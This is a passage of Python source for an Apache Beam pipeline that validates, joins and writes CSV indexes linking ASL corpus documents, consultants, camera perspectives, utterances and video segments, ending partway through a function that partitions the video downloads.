      return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
    # ((<doc id>, <asl consultant id>), (<doc filename>, <participant name>, <utterance seq id>, <media filename>, <camera perspective>))
    validated_results.append(
      (
        (doc_id, asl_consultant_id),
        (doc_fname, participant_name, _utterance_seq_id, _media_fname, _camera_perspective)
      )
    )
  return validated_results
def validate_preprocess_target_video_to_segment_mapping(target_video_to_segment_mapping_tpl):
    """
    Validate the CoGroupByKey-merged target-video-to-segment mapping and flatten it
    into one index row per (doc/consultant/camera-perspective, segment) pair.

    target_video_to_segment_mapping_tpl:
        (
            <target video fname>,
            {
                'doc_consultant_camera_perspective_mapping': [
                    (
                        <doc id>,            # <target video fname> can occur in more than one document
                        <asl consultant id>, # must map 1-to-1 to <target video fname>
                        <camera perspective> # must map 1-to-1 to <target video fname>
                    ) # there can be more than one
                ],
                'video_to_segment_url_list_as_str': [<target video segment url list (as string)>] # should be only one string
            }
        )

    return:
        listof(
            (
                (<corpus doc id>, <asl consultant id>, <camera perspective>, <seg seq id>), # key
                (<target video fname>, <seg filename>, <seg url>)                           # data
            )
        )
        On any validation failure the ORIGINAL input tuple is returned instead; its shape
        will not match validated rows, which deliberately triggers a downstream Beam error.
    """
    validated_results = []
    target_video_fname = target_video_to_segment_mapping_tpl[0]

    # de-duplicate the (doc id, consultant id, camera perspective) associations
    doc_consultant_camera_perspective_mapping = list(set(target_video_to_segment_mapping_tpl[1]['doc_consultant_camera_perspective_mapping']))
    if len(doc_consultant_camera_perspective_mapping) == 0:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} doc_consultant_camera_perspective_mapping is empty")
        return target_video_to_segment_mapping_tpl  # note that this will cause an exception in beam since the shape will not match other validated rows

    # there must be exactly one unique ';'-delimited segment-url string for this target video
    video_to_segment_url_list_as_str = list(set(target_video_to_segment_mapping_tpl[1]['video_to_segment_url_list_as_str']))
    if len(video_to_segment_url_list_as_str) != 1:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} segment list is either empty or not unique: {video_to_segment_url_list_as_str}")
        return target_video_to_segment_mapping_tpl  # note that this will cause an exception in beam since the shape will not match other validated rows
    video_to_segment_url_list_as_str = video_to_segment_url_list_as_str[0]

    # collect the distinct consultants/camera perspectives seen so 1-to-1 mapping can be
    # verified after the loop (each must resolve to exactly one value per target video)
    multiple_asl_consultants = []
    multiple_camera_perspectives = []
    for seg_seq_id, seg_url in enumerate(video_to_segment_url_list_as_str.split(';')):
        seg_fname = str(seg_url).split('/')[-1]
        for doc_consultant_camera_perspective_mapping_instance in doc_consultant_camera_perspective_mapping:
            _doc_id = doc_consultant_camera_perspective_mapping_instance[0]
            _asl_consultant_id = doc_consultant_camera_perspective_mapping_instance[1]
            if _asl_consultant_id not in multiple_asl_consultants:
                multiple_asl_consultants.append(_asl_consultant_id)
            _camera_perspective = doc_consultant_camera_perspective_mapping_instance[2]
            if _camera_perspective not in multiple_camera_perspectives:
                multiple_camera_perspectives.append(_camera_perspective)
            validated_results.append(
                (
                    (
                        _doc_id,
                        _asl_consultant_id,
                        _camera_perspective,
                        seg_seq_id
                    ),
                    (
                        target_video_fname,
                        seg_fname,
                        seg_url
                    )
                )
            )

    if len(multiple_asl_consultants) != 1:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} asl consultant is either empty or not unique: {multiple_asl_consultants}")
        return target_video_to_segment_mapping_tpl  # note that this will cause an exception in beam since the shape will not match other validated rows
    if len(multiple_camera_perspectives) != 1:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} camera perspective is either empty or not unique: {multiple_camera_perspectives}")
        return target_video_to_segment_mapping_tpl  # note that this will cause an exception in beam since the shape will not match other validated rows
    return validated_results
def pl__6__create_document_asl_consultant_target_video_index_pcolls(
    ss_parsed_xmldb_pcoll,
    document_asl_consultant_index_schemad_pcoll,
    full_target_vid_index_schemad_pcoll,
    d_pl_options
):
    """
    Build the (document, ASL consultant, target video, utterance) index and the
    per-target-video segment index from the parsed SignStream xmldb pcoll.

    Args:
        ss_parsed_xmldb_pcoll: pcoll of parsed SignStream xmldb dicts; each row dict is
            read for 'CORPUS_DOCUMENT_FILENAME', 'PARTICIPANT_SEQUENCE' (each with
            'PARTICIPANT_NAME' and 'UTTERANCE_SEQUENCE', each utterance with
            'TARGET_VIDEO_SEQUENCE' carrying 'TARGET_VIDEO_FNAME').
        document_asl_consultant_index_schemad_pcoll: schemad rows providing
            (Filename, ParticipantName) -> (DocumentID, ASLConsultantID).
        full_target_vid_index_schemad_pcoll: schemad video-index rows; fields used here:
            target_video_filename and compressed_mov_url (the ';'-delimited segment list).
        d_pl_options: pipeline options dict (passed through to transforms that need it).

    Returns:
        (document_asl_consultant_target_video_utterance_index_schemad_pcoll,
         document_target_video_segment_index_schemad_pcoll)
        — see the beam.Row schemas applied near the end of each pipeline below.
    """
    # get list of target video infos
    target_video_doc_participant_utterance_mapping = (
        ss_parsed_xmldb_pcoll
        | "Beam PL: get doc filename, participant name, utterance seq id associated with this target video, keyed by target video filename" >> beam.Map(
            lambda ss_parsed_xmldb_pcoll_row_dict: [
                (  # key
                    doc_participant_utterance_video_tpl[3],  # <target video filename>
                    (
                        doc_participant_utterance_video_tpl[0],  # <corpus doc filename>
                        doc_participant_utterance_video_tpl[1],  # <participant name>
                        doc_participant_utterance_video_tpl[2]   # <utterance seq id>
                    )
                ) for doc_participant_utterance_video_tpl in [
                    (
                        ss_parsed_xmldb_pcoll_row_dict['CORPUS_DOCUMENT_FILENAME'],
                        d_participant['PARTICIPANT_NAME'],
                        utterance_seq_id,
                        str(urllib.parse.quote(d_target_video['TARGET_VIDEO_FNAME']))  # url-quote: there may be spaces!
                    ) for d_participant in ss_parsed_xmldb_pcoll_row_dict['PARTICIPANT_SEQUENCE']
                        for utterance_seq_id, d_utterance in enumerate(d_participant['UTTERANCE_SEQUENCE'])
                            for d_target_video in d_utterance['TARGET_VIDEO_SEQUENCE']
                ]
            ]
        )  # outputs pcoll with each row list of (<video filename>, (<corpus doc filename>, <participant name>, <utterance seq id>))
        | "Beam PL: 'explode' list of target_video_doc_participant_utterance_mapping tuples" >> beam.FlatMap(lambda list_target_video_doc_participant_utterance_mapping_mapping_tpl: list_target_video_doc_participant_utterance_mapping_mapping_tpl)
        | "Beam PL: select distinct list_target_video_doc_participant_utterance_mapping_tpl tuples" >> beam.Distinct()
        # debug
        # | "Beam PL: print pl__6__create_document_asl_consultant_target_video_index_pcolls result" >> beam.ParDo(beam__common.PipelinePcollPrinter("pl__6__create_document_asl_consultant_target_video_index_pcolls result"))
    )

    # now extract distinct target video fnames from media_doc_participant_mapping
    target_video_list_pcoll = (
        target_video_doc_participant_utterance_mapping
        | "Beam PL: extract media fname" >> beam.Map(lambda target_video_doc_participant_utterance_mapping_row_tpl: target_video_doc_participant_utterance_mapping_row_tpl[0])
        | "Beam PL: select distinct target video filenames" >> beam.Distinct()
        # debug
        # | "Beam PL: print media associated with this ss_parsed_xmldb" >> beam.ParDo(beam__common.PipelinePcollPrinter("\tmedia"))
    )

    # keep only the vid-index entries whose target video occurs in this xmldb
    # (target_video_list_pcoll is used as a side input here)
    target_full_target_vid_index_mapping = (
        full_target_vid_index_schemad_pcoll
        | "Beam PL: filter matching rows from vid index" >> beam.Filter(
            lambda vid_index_entry, matching_target_video_fnames: vid_index_entry.target_video_filename in matching_target_video_fnames,
            matching_target_video_fnames=beam.pvalue.AsIter(target_video_list_pcoll),
        )
        | "Beam PL: key matching vid index entries by target vid fname" >> beam.Map(
            lambda matching_target_vid_index_entry: (matching_target_vid_index_entry.target_video_filename, matching_target_vid_index_entry)
        )
        # debug
        # | "Beam PL: print vid index entries matching media associated with this ss_parsed_xmldb" >> beam.ParDo(beam__common.PipelinePcollPrinter("\tmatching vid index media"))
    )

    # merge doc, participant, and camera perspective keyed by media filename
    # this pcoll will be used to produce final pcolls:
    #   document_asl_consultant_target_video_index_schemad_pcoll
    target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping = (
        ({
            'target_video_doc_participant_utterance_mapping': target_video_doc_participant_utterance_mapping,
            'target_full_target_vid_index_mapping': target_full_target_vid_index_mapping
        })
        | "Beam PL: merge target_video_doc_participant_utterance_mapping and target_full_target_vid_index_mapping" >> beam.CoGroupByKey()
        # the above produces tuples in the form:
        #   (
        #     <target video fname>, # key
        #     {
        #       'target_video_doc_participant_utterance_mapping': [
        #         (
        #           <corpus doc filename>,
        #           <participant_name>,
        #           <utterance seq id>
        #         )
        #       ],
        #       'target_video_camera_perspective_mapping': [
        #         beam.Row(
        #           target_video_filename=<target_video_filename>,
        #           video_seq_id=<video_seq_id>,
        #           perspective_cam_id=<perspective_cam_id>,
        #           compressed_mov_url=<compressed_mov_url>,
        #           uncompressed_avi_url=<uncompressed_avi_url>,
        #           uncompressed_avi_mirror_1_url=<uncompressed_avi_mirror_1_url>,
        #           <uncompressed_avi_mirror_2_url>
        #         )
        #       ]
        #     }
        #   )
        # debug
        # | "Beam PL: print target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping entry"))
    )

    # validate/flatten the merged mapping; invalid rows pass through unchanged and
    # will deliberately break downstream shape expectations (see the validator)
    doc_participant_to_utterance_video_cameraperspective_mapping = (
        target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping
        | "Beam PL: validate/preprocess doc_participant_to_utterance_video_cameraperspective_mapping" >> beam.FlatMap(validate_preprocess_doc_participant_to_utterance_video_cameraperspective_mapping)
    )

    # now use document_asl_consultant_index_schemad_pcoll in order to associate doc id and asl consultant id:
    document_participant_with_ids_mapping = (
        document_asl_consultant_index_schemad_pcoll
        | "Beam PL: transform document_asl_consultant_index_schemad_pcoll rows into ((<document fname>, <participant name>), (<document id>, <asl consultant id>))" >> beam.Map(
            lambda document_asl_consultant_index_schemad_pcoll_row: (
                (document_asl_consultant_index_schemad_pcoll_row.Filename, document_asl_consultant_index_schemad_pcoll_row.ParticipantName),
                (document_asl_consultant_index_schemad_pcoll_row.DocumentID, document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID)
            )
        )
    )

    # merge doc, participant, and camera perspective keyed by media filename
    document_asl_consultant_target_video_utterance_index_schemad_pcoll = (
        ({
            'document_participant_with_ids_mapping': document_participant_with_ids_mapping,
            'doc_participant_to_utterance_video_cameraperspective_mapping': doc_participant_to_utterance_video_cameraperspective_mapping
        })
        | "Beam PL: merge document_participant_with_ids_mapping and doc_participant_to_utterance_video_cameraperspective_mapping" >> beam.CoGroupByKey()
        # the above produces tuples in the form:
        #   (
        #     (<doc filename>, <participant name>), # key
        #     {
        #       'document_participant_with_ids_mapping': [(<doc id>, <asl consultant id>)],
        #       'doc_participant_to_utterance_video_cameraperspective_mapping': [(<utterance seq id>, <video fname>, <camera perspective>)]
        #     }
        #   )
        # | "Beam PL: print merged document_participant_with_ids_mapping and doc_participant_to_utterance_video_cameraperspective_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("\tmerged document_participant_with_ids_mapping and doc_participant_to_utterance_video_cameraperspective_mapping entry"))
        | "Beam PL: validate/preprocess video_doc_participant_utterance_camera_perspective_with_ids_pcoll" >> beam.FlatMap(validate_preprocess_video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl)
        # the above produces tuples in the form:
        #   ((<doc id>, <asl consultant id>), (<doc filename>, <participant name>, <utterance seq id>, <media filename>, <camera perspective>))
        | "Beam PL: apply schema to create final document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.Map(
            lambda document_asl_consultant_video_index_pcoll_row_tpl: beam.Row(
                # SCHEMA_COL_NAMES__VIDEO_DS = [
                #   'DocumentID',
                #   'ASLConsultantID',
                #   'CameraPerspective',
                #   'TargetVideoFilename'
                # ]
                DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
                DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
                ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
                ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
                UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
                CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
                TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
            )
        )
        # debug
        # | "Beam PL: print document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_target_video_utterance_index_schemad_pcoll entry"))
    )

    # re-key the index rows by target video filename for the segment-index join below
    target_video_fname_to_doc_consultant_camera_perspective_mapping = (
        document_asl_consultant_target_video_utterance_index_schemad_pcoll
        | "Beam PL: extract (<target video filename>, (<corpus doc id>, <asl consultant id>, <camera perspective>)) from document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.Map(
            lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
                document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,  # key
                (
                    document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
                    document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
                    document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
                )
            )
        )
    )

    # NOTE: the ';'-delimited segment list comes from the vid index's compressed_mov_url field
    target_video_to_segment_url_list = (
        target_full_target_vid_index_mapping  # (matching_target_vid_index_entry.target_video_filename, matching_target_vid_index_entry)
        | "Beam PL: extract (<target video filename>, <segment video url list as string>) from full_target_vid_index_mapping" >> beam.Map(
            lambda target_full_target_vid_index_mapping_row_tpl: (
                target_full_target_vid_index_mapping_row_tpl[0],
                target_full_target_vid_index_mapping_row_tpl[1].compressed_mov_url
            )
        )
    )

    document_target_video_segment_index_schemad_pcoll = (
        ({
            'doc_consultant_camera_perspective_mapping': target_video_fname_to_doc_consultant_camera_perspective_mapping,
            'video_to_segment_url_list_as_str': target_video_to_segment_url_list
        })
        | "Beam PL: merge doc_consultant_camera_perspective_mapping and video_to_segment_url_list_as_str" >> beam.CoGroupByKey()
        # the above produces tuples of the form:
        #   (
        #     <target video fname>,
        #     {
        #       'doc_consultant_camera_perspective_mapping': listof( (<doc id>, <asl consultant id>, <camera perspective>) ),
        #       'video_to_segment_url_list_as_str': listof( (<target video segment url list (as string)>) )
        #     }
        #   )
        | "Beam PL: validate/preprocess target_video_to_segment_mapping_pcoll" >> beam.FlatMap(validate_preprocess_target_video_to_segment_mapping)
        # the above produces tuples of the form:
        #   (
        #     (<corpus doc id>, <asl consultant id>, <camera perspective>, <seg seq id>), # key
        #     (<target video fname>, <seg filename>, <seg url>)) # data
        #   )
        | "Beam PL: apply schema to create final target_video_segment_index_pcoll" >> beam.Map(
            lambda target_video_to_segment_mapping_pcoll_row_tpl: beam.Row(
                # SCHEMA_COL_NAMES__VIDEO_SEGMENT_DS = [
                #   'DocumentID',
                #   'ASLConsultantID',
                #   'CameraPerspective',
                #   'SegmentSequence',
                #   'SegmentVideoFilename',
                #   'URL'
                # ]
                DocumentID=int(target_video_to_segment_mapping_pcoll_row_tpl[0][0]),
                ASLConsultantID=int(target_video_to_segment_mapping_pcoll_row_tpl[0][1]),
                CameraPerspective=int(target_video_to_segment_mapping_pcoll_row_tpl[0][2]),
                TargetVideoFilename=str(target_video_to_segment_mapping_pcoll_row_tpl[1][0]),
                SegmentSequence=int(target_video_to_segment_mapping_pcoll_row_tpl[0][3]),
                SegmentVideoFilename=str(target_video_to_segment_mapping_pcoll_row_tpl[1][1]),
                URL=str(target_video_to_segment_mapping_pcoll_row_tpl[1][2])
            )
        )
        # debug
        # | "Beam PL: print target_video_to_segment_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("target_video_to_segment_mapping entry"))
    )

    return document_asl_consultant_target_video_utterance_index_schemad_pcoll, document_target_video_segment_index_schemad_pcoll
def pl__7__write_document_asl_consultant_target_video_index_csv(document_asl_consultant_target_video_utterance_index_schemad_pcoll, d_pl_options):
    """
    Write two CSVs from the schemad (doc, consultant, target-video, utterance) index:
      1. DOCUMENT-ASLCONSULTANT-VIDEO-INDEX (DocumentID, ASLConsultantID, CameraPerspective, Filename)
      2. DOCUMENT-ASLCONSULTANT-VIDEO-UTTERANCE-INDEX (adds TargetVideoFilename, UtteranceSequence)

    document_asl_consultant_target_video_utterance_index_schemad_pcoll rows:
        beam.Row(
            # SCHEMA_COL_NAMES__VIDEO_DS = [
            #   'DocumentID',
            #   'ASLConsultantID',
            #   'CameraPerspective',
            #   'TargetVideoFilename'
            # ]
            DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
            DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
            ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
            ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
            UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
            CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
            TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
        )

    Returns a 2-tuple: the results of the two beam__common.pl__X__write_pcoll_to_csv calls
    (csv-path pcolls), in the order listed above.
    """
    distinct_document_asl_consultant_video_index_pcoll = (
        document_asl_consultant_target_video_utterance_index_schemad_pcoll
        | "Beam PL: extract SCHEMA_COL_NAMES__VIDEO_DS columns from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Map(
            lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
                document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
                document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
                document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective,
                document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,
                # document_asl_consultant_target_video_index_schemad_pcoll_row.FrameSequence,
                # document_asl_consultant_target_video_index_schemad_pcoll_row.FramePath,
                document_asl_consultant_target_video_index_schemad_pcoll_row.UtteranceSequence
            )
        )
        # NOTE(review): UtteranceSequence is part of the tuple fed to Distinct(), so the
        # "video index" CSV below (which drops index 4) can repeat a
        # (DocumentID, ASLConsultantID, CameraPerspective, Filename) combination across
        # utterances — confirm whether a second Distinct() after the projection is wanted.
        | "Beam PL: select distinct document_asl_consultant_video_index rows" >> beam.Distinct()
    )
    sorted_distinct_document_asl_consultant_video_index_pcoll = beam__common.pl__X__sort_pcoll(
        distinct_document_asl_consultant_video_index_pcoll,
        pcoll_label="distinct_document_asl_consultant_video_index"
    )
    # project to the 4 VIDEO_DS columns and serialize each row to a csv string
    sorted_distinct_document_asl_consultant_video_index_csv_rows_pcoll = (
        sorted_distinct_document_asl_consultant_video_index_pcoll
        | "Beam PL: apply minimal schema to create final document_asl_consultant_target_video_index_schemad_pcoll of distinct rows" >> beam.Map(
            lambda distinct_document_asl_consultant_video_index_row: beam.Row(
                DocumentID=int(distinct_document_asl_consultant_video_index_row[0]),
                ASLConsultantID=int(distinct_document_asl_consultant_video_index_row[1]),
                CameraPerspective=int(distinct_document_asl_consultant_video_index_row[2]),
                Filename=str(distinct_document_asl_consultant_video_index_row[3])
            )
        )
        | beam.Map(lambda distinct_document_asl_consultant_target_video_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_target_video_index_schemad_pcoll_row))
    )

    # second output: the utterance-level index (keeps UtteranceSequence)
    distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll = (
        document_asl_consultant_target_video_utterance_index_schemad_pcoll
        | "Beam PL: extract columns for distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.Map(
            lambda document_asl_consultant_target_video_utterance_index_schemad_pcoll_row: (
                document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.DocumentID,
                document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.ASLConsultantID,
                document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.CameraPerspective,
                document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.TargetVideoFilename,
                # document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.FrameSequence,
                # document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.FramePath,
                document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.UtteranceSequence
            )
        )
        | "Beam PL: select distinct document_asl_consultant_target_video_utterance_index rows" >> beam.Distinct()
    )
    sorted_distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll = beam__common.pl__X__sort_pcoll(
        distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll,
        pcoll_label="distinct_document_asl_consultant_target_video_utterance_index"
    )
    sorted_distinct_document_asl_consultant_target_video_utterance_index_csv_rows_pcoll = (
        sorted_distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll
        | "Beam PL: apply minimal schema to create final distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll of distinct rows" >> beam.Map(
            lambda distinct_document_asl_consultant_target_video_utterance_index_row: beam.Row(
                DocumentID=int(distinct_document_asl_consultant_target_video_utterance_index_row[0]),
                ASLConsultantID=int(distinct_document_asl_consultant_target_video_utterance_index_row[1]),
                CameraPerspective=int(distinct_document_asl_consultant_target_video_utterance_index_row[2]),
                TargetVideoFilename=str(distinct_document_asl_consultant_target_video_utterance_index_row[3]),
                # FrameSequence=int(distinct_document_asl_consultant_target_video_utterance_index_row[4]),
                # FramePath=str(distinct_document_asl_consultant_target_video_utterance_index_row[4]),
                UtteranceSequence=int(distinct_document_asl_consultant_target_video_utterance_index_row[4])
            )
        )
        | beam.Map(lambda distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll_row))
    )
    return beam__common.pl__X__write_pcoll_to_csv(  # document_asl_consultant_video_index_csv_path
        sorted_distinct_document_asl_consultant_video_index_csv_rows_pcoll,
        "DOCUMENT-ASLCONSULTANT-VIDEO-INDEX",
        fidscs_globals.VIDEO_DS_FNAME,
        fidscs_globals.SCHEMA_COL_NAMES__VIDEO_DS,
        d_pl_options
    ), beam__common.pl__X__write_pcoll_to_csv(
        sorted_distinct_document_asl_consultant_target_video_utterance_index_csv_rows_pcoll,
        "DOCUMENT-ASLCONSULTANT-VIDEO-UTTERANCE-INDEX",
        fidscs_globals.VIDEO_UTTERANCE_DS_FNAME,
        ['DocumentID', 'ASLConsultantID', 'CameraPerspective', 'TargetVideoFilename', 'UtteranceSequence'],
        d_pl_options
    )
def pl__7__write_document_asl_consultant_utterance_video_index_csv(document_asl_consultant_target_video_index_schemad_pcoll, d_pl_options):
    """
    Write the DOCUMENT-ASLCONSULTANT-UTTERANCE-TARGETVIDEO-INDEX csv
    (SCHEMA_COL_NAMES__UTTERANCE_VIDEO_DS) from the schemad index pcoll and return
    the resulting csv-path pcoll from beam__common.pl__X__write_pcoll_to_csv.
    """
    distinct_document_asl_consultant_utterance_video_index_pcoll = (
        document_asl_consultant_target_video_index_schemad_pcoll
        # input rows have the shape:
        # beam.Row(
        #   # SCHEMA_COL_NAMES__VIDEO_DS = [
        #   #   'DocumentID',
        #   #   'ASLConsultantID',
        #   #   'CameraPerspective',
        #   #   'TargetVideoFilename'
        #   # ]
        #   DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
        #   DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
        #   ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
        #   ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
        #   UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
        #   CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
        #   TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
        # )
        | "Beam PL: extract (DocumentID, ASLConsultantID, UtteranceSequence, CameraPerspective) from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Map(
            lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
                document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
                document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
                document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,  # added
                document_asl_consultant_target_video_index_schemad_pcoll_row.UtteranceSequence,
                document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
            )
        )
        | "Beam PL: select distinct (DocumentID, ASLConsultantID, UtteranceSequence, CameraPerspective) extracted from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Distinct()
    )
    # deterministic ordering before serialization
    sorted_distinct_document_asl_consultant_utterance_video_index_pcoll = beam__common.pl__X__sort_pcoll(
        distinct_document_asl_consultant_utterance_video_index_pcoll,
        pcoll_label="distinct_document_asl_consultant_utterance_video_index"
    )
    sorted_distinct_document_asl_consultant_utterance_video_index_csv_rows_pcoll = (
        sorted_distinct_document_asl_consultant_utterance_video_index_pcoll
        | "Beam PL: apply schema to create final document_asl_consultant_utterance_video_index_schemad_pcoll" >> beam.Map(
            lambda distinct_document_asl_consultant_video_index_row: beam.Row(
                # SCHEMA_COL_NAMES__UTTERANCE_VIDEO_DS = [
                #   'DocumentID',
                #   'ASLConsultantID',
                #   'TargetVideoFilename',
                #   'UtteranceSequence',
                #   'CameraPerspective'
                # ]
                DocumentID=int(distinct_document_asl_consultant_video_index_row[0]),
                ASLConsultantID=int(distinct_document_asl_consultant_video_index_row[1]),
                TargetVideoFilename=str(distinct_document_asl_consultant_video_index_row[2]),
                UtteranceSequence=int(distinct_document_asl_consultant_video_index_row[3]),
                CameraPerspective=int(distinct_document_asl_consultant_video_index_row[4])
            )
        )
        | beam.Map(lambda distinct_document_asl_consultant_utterance_video_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_utterance_video_index_schemad_pcoll_row))
    )
    return beam__common.pl__X__write_pcoll_to_csv(
        sorted_distinct_document_asl_consultant_utterance_video_index_csv_rows_pcoll,
        "DOCUMENT-ASLCONSULTANT-UTTERANCE-TARGETVIDEO-INDEX",
        fidscs_globals.UTTERANCE_VIDEO_DS_FNAME,
        fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_VIDEO_DS,
        d_pl_options
    )  # document_asl_consultant_utterance_video_index_csv_path
def pl__7__write_document_target_video_segment_index_csv(document_target_video_segment_index_schemad_pcoll, d_pl_options):
    """
    Write the DOCUMENT-ASLCONSULTANT-TARGETVIDEO-SEGMENT-INDEX csv from the schemad
    video-segment index pcoll and return the csv-path pcoll produced by
    beam__common.pl__X__write_pcoll_to_csv.
    """
    # Flatten each schemad row into a plain tuple so Distinct() can hash/compare it.
    segment_tuples_pcoll = (
        document_target_video_segment_index_schemad_pcoll
        | "Beam PL: extract (DocumentID, ASLConsultantID, CameraPerspective, TargetVideoFilename, SegmentSequence, SegmentVideoFilename, URL) from document_target_video_segment_index_schemad_pcoll" >> beam.Map(
            lambda seg_row: (
                seg_row.DocumentID,
                seg_row.ASLConsultantID,
                seg_row.CameraPerspective,
                seg_row.TargetVideoFilename,
                seg_row.SegmentSequence,
                seg_row.SegmentVideoFilename,
                seg_row.URL,
            )
        )
        | "Beam PL: select distinct (DocumentID, ASLConsultantID, CameraPerspective, TargetVideoFilename, SegmentSequence, SegmentVideoFilename, URL) extracted from target_video_segment_index_pcoll" >> beam.Distinct()
    )
    # Deterministic ordering before serialization.
    ordered_segment_tuples_pcoll = beam__common.pl__X__sort_pcoll(
        segment_tuples_pcoll,
        pcoll_label="target_video_segment_index"
    )
    # Re-apply the SCHEMA_COL_NAMES__VIDEO_SEGMENT_DS schema, then serialize rows to csv strings.
    segment_csv_rows_pcoll = (
        ordered_segment_tuples_pcoll
        | "Beam PL: re-apply schema to create final sorted_target_video_segment_index_schemad_pcoll" >> beam.Map(
            lambda seg_tpl: beam.Row(
                DocumentID=seg_tpl[0],
                ASLConsultantID=seg_tpl[1],
                CameraPerspective=seg_tpl[2],
                TargetVideoFilename=seg_tpl[3],
                SegmentSequence=seg_tpl[4],
                SegmentVideoFilename=seg_tpl[5],
                URL=seg_tpl[6]
            )
        )
        | beam.Map(lambda schemad_seg_row: beam__common.beam_row_to_csv_string(schemad_seg_row))
    )
    return beam__common.pl__X__write_pcoll_to_csv(
        segment_csv_rows_pcoll,
        "DOCUMENT-ASLCONSULTANT-TARGETVIDEO-SEGMENT-INDEX",
        fidscs_globals.VIDEO_SEGMENT_DS_FNAME,
        fidscs_globals.SCHEMA_COL_NAMES__VIDEO_SEGMENT_DS,
        d_pl_options
    )  # target_video_segment_index_csv_path
def pl__4__debug_print_signstream_db(ss_parsed_xmldb_pcoll):
    """Attach a debug transform that prints each parsed SignStream xmldb row; returns the resulting pcoll."""
    printed_pcoll = (
        ss_parsed_xmldb_pcoll
        | "Beam PL: debug print parsed signstream xmldb" >> beam.Map(debug_print_signstream_db)
    )
    return printed_pcoll
def pl__3__parallel_download_videos(vid_index_schemad_pcoll, d_pl_options, n_partitions=8):
    """
    Randomly partition the schemad video index into n_partitions pcolls, run the
    segment-info gathering and segment-download ParDos on each partition
    independently, and return the Flatten()-ed download results.
    """
    # Random assignment: segment downloads are independent, so any partitioning works.
    download_partitions = (
        vid_index_schemad_pcoll
        | "Beam PL: partition schemad video index for download parallelization" >> beam.Partition(
            lambda vid_index_row, num_partitions: random.randint(0, num_partitions - 1),
